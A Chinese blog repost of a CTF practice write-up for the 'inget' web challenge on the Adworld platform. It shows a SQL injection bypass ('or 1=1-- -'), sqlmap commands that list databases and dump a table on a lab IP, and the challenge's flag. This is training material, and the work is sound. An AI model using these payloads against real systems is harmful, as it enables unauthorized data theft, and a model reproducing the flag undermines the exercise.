攻防世界WEB练习-inget - 码农知识堂 - 文章详情页

攻防世界WEB练习-inget

目录

题目场景

尝试SQL注入

尝试sqlmap注入

找到flag

题目场景

尝试SQL注入

?id=1' and 1=1-- -

?id=1' and 1=2-- -

?id=1' or 1=2-- -

都均无回显

?id=1' or 1=1-- -

回显出flag

Please enter ID,and Try to bypass

nice : congratulations

Flag Is : cyberpeace{76d13a6f794e1946a69a955eeb3d688d}

尝试sqlmap注入

sqlmap下载地址：http://sqlmap.org

python sqlmap.py -u "http://61.147.171.105:56192/index.php?id=1" -dbs

查看cyber表中数据

python sqlmap.py -u "http://61.147.171.105:56192/index.php?id=1" -T cyber --dump

找到flag

cyberpeace{76d13a6f794e1946a69a955eeb3d688d}
相关阅读:
Linux系统性能监测工具——负载/内存/磁盘
 开启数字消费新纪元
 【FPGA】FPGA入门 —— 基本开发流程
 右值引用、std::move()和移动构造的理解
 Chisel-Strike：一款功能强大的.NET异或XOR加密CobaltStrike Aggressor实现
 2.1.4进程之间的通信
 【软考学习5】流水线基本概念、周期执行时间、吞吐率、加速比和效率的计算
 内卷？泡沫？变革？十个问题直击“元宇宙”核心困惑丨《问Ta-王雷元宇宙时间》精华实录...
ubuntu编译和链接特定版本的opencv和boost
分享我做Dotnet9博客网站时积累的一些资料
原文地址：https://blog.csdn.net/lyshark_lyshark/article/details/126799920